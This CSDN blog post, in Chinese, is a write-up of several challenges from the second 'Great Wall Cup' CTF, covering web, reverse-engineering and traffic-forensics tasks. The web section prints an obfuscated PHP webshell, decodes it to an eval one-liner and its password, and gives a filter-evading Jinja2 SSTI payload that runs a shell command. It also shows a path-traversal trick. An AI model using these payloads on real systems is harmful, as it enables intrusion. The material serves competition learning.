第二届“长城杯”信息安全铁人三项赛部分wp

CTF竞赛多类型题目解题思路
最新推荐文章于 2025-03-15 16:42:44 发布
最新推荐文章于 2025-03-15 16:42:44 发布
阅读量1.2k 收藏 9
点赞数 15
CC 4.0 BY-SA版权
文章标签: CTF WEB 应急响应
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jnszstmei/article/details/144538540

Web

hello_web

查看页面源码,如下所示

image-20241216215212388

发现两个提示的php文件,我们尝试访问hackme.php

image-20241216215227542

发现不是这样利用的,tips.php也读不到,我们尝试换一种路径穿越的读法,经过搜索可以知道我们可以用.和/进行组合进行路径穿越,最后在fuzz测试下,我们发现…//组合可以读到文件源码,如下所示

image-20241216215256719

利用相同的方式,我们可以去读tips.php,如下所示

image-20241216215309423

是一个phpinfo文件,我们可以看到禁用了一些函数,但是可以先不管,我们去分析一下这个hackme.php,如下所示

<?php
highlight_file(__FILE__);
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";
$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";
$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};
$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};
$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};
$rVkKjU=$lapUCm{7}.$lapUCm{13};
$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};
eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
?>

根据php函数逻辑,我们可以很容易知道这几个混淆变量是什么

$OxirhK = strtr;
$YpAUWC = substr;
$rVkKjU = 52;
$YwzIst = base64_decode;

eval($YwzIst("$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";eval('?>'.$YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU))));"));

最后我们可以知道这个eval语句的内容

?><?php @eval($POST['cmd_66.99']);?>

其实是一个一句话木马,密码为cmd_66.99,但这里值得注意的是,由于php会自动将[转变为_,所以我们的真正的密码是cmd[66.99,我们直接用蚁剑连接即可

image-20241216215327978

可以发现能连接上

image-20241216215340201

但是我们可以发现找不到flag,我们尝试执行命令,但是被禁止了

image-20241216215352642

这里我们使用蚁剑自带的插件disable_function绕过即可

image-20241216215411924

image-20241216215430886

我们直接读取flag即可

safe_proxy

image-20241217161924688

重点在这,我们一看到使用了flask框架,首先肯定是要验证是否存在ssti漏洞了,我们可以看到这里过滤了很多ssti有关的函数,更进一步验证了我们的猜想,我们使用最常见的措施payload,如下所示

image-20241217161942941

我们尝试如下构造payload

code={%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set ax='so'[::-1]%}{{cycler.next[gl][bu][im](ax)['p''open']('cat /flag > app.py').read()}}

这里解释一下,通过设置拼接符绕过对__的过滤,我们通过拼接形成__globals__以及__builtins__以及__import__,最后我们拼接一个popen去读取我们的flag,我们先在firefox中试试这个payload

image-20241217162002783

一开始执行的时候我们会出现ok,但是我们刷新几次,或者将浏览器倒退,就可以发现flag,发现的很巧合,原本以为这样构造payload不行

Reverse

ezCsky

直接ida打开,不管他能不能反编译,可以发现符号表里存在和rc4相关的函数名,找到了密钥testkey和密文解密即可,解密完还需要从后往前异或后一位,最后一位已知是"}"

def KSA(key):
    """ Key-Scheduling Algorithm (KSA) 密钥调度算法"""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def PRGA(S):
    """ Pseudo-Random Generation Algorithm (PRGA) 伪随机数生成算法"""
    i, j = 0, 0
    while True:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        yield K


def RC4(key, text):
    """ RC4 encryption/decryption """
    S = KSA(key)
    keystream = PRGA(S)
    res = []
    i = 0
    for char in text:
        res.append(char ^ next(keystream))
        i += 1
    return bytes(res)


if __name__ == "__main__":
    key = b"testkey"
    text = [0x96, 0x8F, 0xB8, 0x08, 0x5D, 0xA7, 0x68, 0x44, 0xF2, 0x64, 0x92, 0x64, 0x42, 0x7A, 0x78, 0xE6, 0xEA, 0xC2, 0x78, 0xB8, 0x63, 0x9E, 0x5B, 0x3D, 0xD9, 0x28, 0x3F, 0xC8, 0x73, 0x06, 0xEE, 0x6B, 0x8D, 0x0C, 0x4B, 0xA3, 0x23, 0xAE, 0xCA, 0x40, 0xED, 0xD1]
    # for i in range(256):
    result = RC4(key, text)
    print(list(result))
    result = list(result)
    result[-1] = ord("}")
    for i in range(len(result)-2, -1, -1):
        result[i] ^= result[i+1]
    print("".join(map(chr, result)))

dump

题目里找到输入为命令行后第一个参数,测试发现用了换表,大写字母减去63,小写字母减去67,数字只有1、2可以直接替换,还有等号、花括号也可以直接找对应,需要注意0、3-9直接换为0,因此需要爆破

s = [0x23, 0x29, 0x1E, 0x24, 0x38, 0x0E, 0x15, 0x20, 0x37, 0x0E, 0x05, 0x20, 0x00, 0x0E, 0x37, 0x12, 0x1D, 0x0F, 0x24, 0x01, 0x01, 0x39]
print(len(s))
xor = [69, 69, 127, 67, 67, 68]
for i in range(len(s)):
    if s[i] == 1:
        s[i] = ord("=")
        continue
    if s[i] == 0x38:
        s[i] = ord("{")
        continue
    if s[i] == 0x39:
        s[i] = ord("}")
        continue
    if s[i] == 0x1c:
        s[i] = ord("1")
        continue
    if s[i] == 0x1d:
        s[i] = ord("2")
        continue
    if s[i] + 67 in list(range(97, 123)):
        s[i] += 67
    elif s[i] + 63 in list(range(65, 91)):
        s[i] += 63
from base64 import b64decode
for i in ["0", "3", "4", "5", "6", "7", "8", "9"]:
    s[12] = ord(i)
    print("".join(map(chr, s)))
    print(b64decode("".join(map(chr, s[5:-1])).encode()))

最后测试的是前四个里,记不清交的哪个了以及交的是base4解密前的还是后的了,一个个试即可

22
flag{MTczMDc0MzQ2Ng==}
b'1730743466'
flag{MTczMDc3MzQ2Ng==}
b'1730773466'
flag{MTczMDc4MzQ2Ng==}
b'1730783466'
flag{MTczMDc5MzQ2Ng==}
b'1730793466'
flag{MTczMDc6MzQ2Ng==}
b'17307:3466'
flag{MTczMDc7MzQ2Ng==}
b'17307;3466'
flag{MTczMDc8MzQ2Ng==}
b'17307<3466'
flag{MTczMDc9MzQ2Ng==}
b'17307=3466'

威胁检测与网络流量分析

zero_shell1

打开流量包,定位到http流量

image-20241216215521821

我们追踪http流

image-20241216215531712

解密得到flag

flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}

zero_shell2

我们用同样的payload,使用burp进行任意命令执行,我们首先执行ls /命令,这里需要url编码

image-20241216215545509

之后一个个查看,发现flag在Database下

直接读取即可

image-20241216215555710

image-20241216215616295

zero_shell3

第三问需要寻找外联域名,我们直接通过netstat命令进行查询当前端口活动情况

image-20241216215707428

复制下来放到文档里分析,如下所示

image-20241216215653649

在这里可以看到一个很奇怪的外联地址,交一下,发现是对的,这个ip地址就是flag

zero_shell4

我们在第二问的路径下执行列出隐藏文件,如下所示

image-20241216215724515

我们可以发现有一个叫.nginx的隐藏文件,我们猜测这个就是我们要找的隐藏文件,直接提交,发现正确

zero_shell5

我们首先使用hexdump读取隐藏文件内容,如下所示

image-20241216215738832

复制出来删除序号,然后我们发现文件内容被翻转了,我们需要两位为一组,相邻两组进行互换,我们使用cyberchef进行操作,最后将字节流导出为可执行文件

image-20241216215750391

最后我们用ida分析该可执行文件,我们在字符串中找到关键字符串

image-20241216215802406

所以flag为flag{11223344qweasdzxc}

zero_shell6

全局搜索有关startup的文件夹,我们执行find / -type d -name "*startup*"

image-20241216215813088

我们一个个去查看一下,最终找到启动文件的完整路径

image-20241216215832014

flag{/var/register/system/startup/scripts/nat/File}

WinFT_1

靶机开启之后启动cports.exe,我们等一会就能发现恶意外联地址

image-20241216215855294

所以flag是flag{``miscsecure.com``:192.168.116.130:443}

WinFT_2

需要寻找启动项中的东西,我们直接启动启动项,如下所示

image-20241216215912377

有一个很明显的flag

f^l^a^g^:JiM3ODsmIzEwNTsmIzk5OyYjMTAxOyYjNjUyOTI7JiMxMDI7JiMxMDg7JiM5NzsmIzEwMzsmIzMyOyYjMTA1OyYjMTE1OyYjMzI7JiMxMjM7JiM2NTsmIzY5OyYjODM7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzk1OyYjMTA1OyYjMTE1OyYjOTU7JiM5NzsmIzExMDsmIzk1OyYjMTAxOyYjMTIwOyYjOTk7JiMxMDE7JiMxMDg7JiMxMDg7JiMxMDE7JiMxMTA7JiMxMTY7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzEyNTs=

base64解码

image-20241216215925222

最后Unicode解码,如下所示

flag is {AES_encryption_algorithm_is_an_excellent_encryption_algorithm}

拿到本题flag

borgeous
关注
第二届长城杯信息安全铁人三项“crypto部分解题wp
符啸九天的博客
12-16 1774
长城杯crypto的fffffhash和rasnd的解题思路
第一届长城杯信息安全铁人三项 取证溯源 (复现)
m0_63138919的博客
09-14 1617
学习
第十八届信息安全 && 第二届长城杯WP,pwn方向:anote
2202_75361164的博客
12-18 309
# pwn ## anote `edit` 函数被用于修改堆内存中的数据。利用该函数覆盖堆内存中的地址,最终导致后门函数被执行。 通过ida可以找到 发现后门函数:
信息安全铁人三项
weixin_45722065的博客
04-22 2541
信息安全铁人三项学习第一天 信息安全数据分析对抗(数据分析) 一.系统日志分析 1.理解 window 系统日志与分析方法 2.理解 windows 安全日志与分析方法 3.理解 windows 应用程序日志与分析方法 4.理解 linux 系统日志与分析方法 1.理解window安全日志与分析方法 对于我们经常使用的操作系统来说,系统日志与分析方法是比较陌生的,我打算先百度看一看怎么查看系...
第十八届全国大学生信息安全第二届长城杯铁人三项web方向部分wp
最新发布
m0_73995253的博客
03-15 1080
查看源代码发现有两个文件,访问一下Tips是phpinfo里面可以看到disable_functionshackme.php中$lapUCm=urldecode(“%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A”);Url解码得到n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j搜索一下。
第二届长城杯web-djangogogo
……
08-23 811
第二届长城杯wp-web
2024长城杯部分wp
roma_road的博客
09-09 900
依次打开发现index(3)为哥斯拉木马文件,index(6)和index无法打开,将其丢入工具中分离。发现index(6)中包含压缩包,压缩包中包含flag.txt文件。哥斯拉木马是通过MD5加密,因此找到MD5解密网站即可得到flag。下载附件发现是pcapng文件,打开wireshark进行抓包。筛选出http协议,发现包含flag.txt文件,将其导出。未碰撞出的可用其他网站继续破解,最后得出flag。木马文件的pass即为压缩包的密码。完成游戏即可获得flag。
第一届“长城杯信息安全铁人三项(四场)部分题目wp
weixin_67961126的博客
04-02 1983
首先看到流量分析的题目用wireshark,再导出http对象列表在zip对象中发现了files.zip。然后尝试暴力破解没有得到密码想着去分析一下文件用到的winhex。根据题目描述的提示结合之前没用到的key,des解码得到flag。就想着是不是还有别的加密----就想到了去检查一下是不是伪加密。发现这么多==是base64隐写,跑脚本得到。得到了key的值是66666666。是伪加密,改09为00。
第一届[长城杯信息安全铁人三项](初第一区)re
liaochonxiang的博客
04-09 777
py3.11\Lib\site-packages\Crypto\Cipher\AES.py",使其输出key和iv。注意提示信息,可在3.11版本python下直接引用encrypto库。查看encrypto.pyd的用法和功能。将base64变表提取。
第十八届全国大学生信息安全(创新实践能力)暨第二届长城杯铁人三项(防护)的通知.zip
11-15
长城杯铁人三项信息安全中的一个项目,它强调的是防护能力,即参者需要在限定时间内,对给定的网络或系统环境进行安全加固,防止外部攻击,确保系统的安全稳定运行。这个项目要求参者不仅要具备扎实...
2024CISCN暨长城杯WP——WEB方向
konpure的博客
12-18 1046
进入题目后F12打开控制台,可以得到两个文件,分别是hackme.php和tips.php,尝试用file参数进行读取,直接读取和php伪协议读取都无法读到,多次尝试后发现可以使用双写绕过读取。传入得到了phpinfo,可以看到中过滤了许多函数可以推测是绕过,然后传入查看文件,得到php代码如下将这段代码反混淆后可以得到一个密码是的木马文件,用蚁剑直接连接执行命令会得到,确定了是disable_functions的绕过使用绕过。
第一届“长城杯信息安全铁人三项(第三区)部分题目wp
m0_74426634的博客
04-02 2302
第一届“长城杯信息安全铁人三项(第三区)部分题目wp(会持续更新)
第十八届信息安全 && 第二届长城杯WP,逆向方向:ezCsky,dump
2202_75361164的博客
12-17 1299
下载附件发现是一个elf,但是正常的IDA打不开,不支持这个架构的不过有一个插件,我们把他的dll下载之后放IDA里面就能打开题目给的ELF了,但是只能看汇编,不能查看伪代码这里是有符号表的,我们可以看见有rc4加密和xor操作密文在这里我们可以提出来,剩下要解决的就是异或和RC4的问题了,但是我们可以去主函数看调用的顺序这里可以看见函数的先后调用顺序分别是check,rc4_init,rc4_crypt,我们先查看check函数下面是主要的逻辑其中addi r6,1;
2024长城杯&CISCN-威胁流量分析-zeroshell
2301_79248867的博客
12-17 1142
ciscn zeroshell 复盘
第十八届信息安全 && 第二届长城杯WP,流量分析方向:zeroshell1~6,WinFT_1~2,sc05_1
2202_75361164的博客
12-18 689
第十八届信息安全 && 第二届长城杯WP,流量分析方向:zeroshell1~6,WinFT_1~2,sc05_1
2023长城杯 web部分题目(seeking&easy_extension)
weixin_63231007的博客
09-13 2043
2023 京津冀网络安全比 web部分wp
第二届长城杯
247533的博客
08-23 768
一血!!!
2024长城杯威胁检测与网络流量分析
2302_81785888的博客
12-17 655
追踪流,解码ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9得到flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}他告诉了写出会话中设置的flag,那就是流量里有flag的标示或者有被加密后flag标识。找到flag{c6045425-6e6e-41d0-be09-95682a4f65c4}通过数据包搜索分组字节流,找flag没找到,找flag的base64编码,找到流量。
第一届长城杯半决wp和AWD笔记
qq_74806534的博客
04-25 3926
网站备份文件泄露可能造成的危害:1. 网站存在备份文件:网站存在备份文件,例如数据库备份文件、网站源码备份文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。2. 敏感文件泄露是高危漏洞之一,敏感文件包括数据库配置信息,网站后台路径,物理路径泄露等,此漏洞可以帮助攻击者进一步攻击,敞开系统的大门。3. 由于目标备份文件较大(xxx.G),可能存在更多敏感数据泄露4. 该备份文件被下载后,可以被用来做代码审计,进而造成更大的危害。
第二届长城杯信息安全铁人三项“初
01-20
### 第二届长城杯信息安全铁人三项详情 #### 初时间安排 第十八届全国大学生信息安全第二届长城杯铁人三项将于2024年12月15日正式开始。目前,事正处于报名阶段,已有超过1700支队伍注册参加[^2]。 #### 参资格与方式 为了促进网络安全领域的人才培养和发展,此次比面向全国高校学生开放。参者可以通过官方渠道进行团队或个人形式的报名。具体报名方法及相关规定可以在官方网站上查询到更多信息。 #### 事结构与规则 该活动由三个部分组成:理论考试、实践操作以及攻防对抗。其中,初主要侧重于考察选手的基础知识掌握情况和技术应用能力。通过在线平台完成一系列的选择题和编程挑战来评估参者的水平[^3]。 #### 成绩评定标准 在比结束后的三小时内,所有战队需上传并提交针对每一道成功解答题目所撰写的详尽解题报告。这些文档将经过评审团严格审查,以此作为评判依据之一。未能按时递交或者未按规定格式编写的报告将会被视作弃权处理。 #### 奖励机制 对于表现优异的学生来说,除了能够赢得荣誉证书外,还有丰厚的资金奖励等待着他们;更重要的是,优秀人才有机会进入国家级别的网络安全专家库,并获取专业的认证资质[^1]。 ```python # 示例代码用于展示如何验证解题报告的时间戳有效性 from datetime import datetime, timedelta def check_submission_time(submission_timestamp_str): submission_format = "%Y-%m-%d %H:%M:%S" current_time = datetime.now() try: submission_time = datetime.strptime(submission_timestamp_str, submission_format) if (current_time - submission_time) <= timedelta(hours=3): return True else: return False except ValueError as e: print(f"Invalid date format: {e}") return None submission_example = "2024-12-15 18:00:00" print(check_submission_time(submission_example)) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值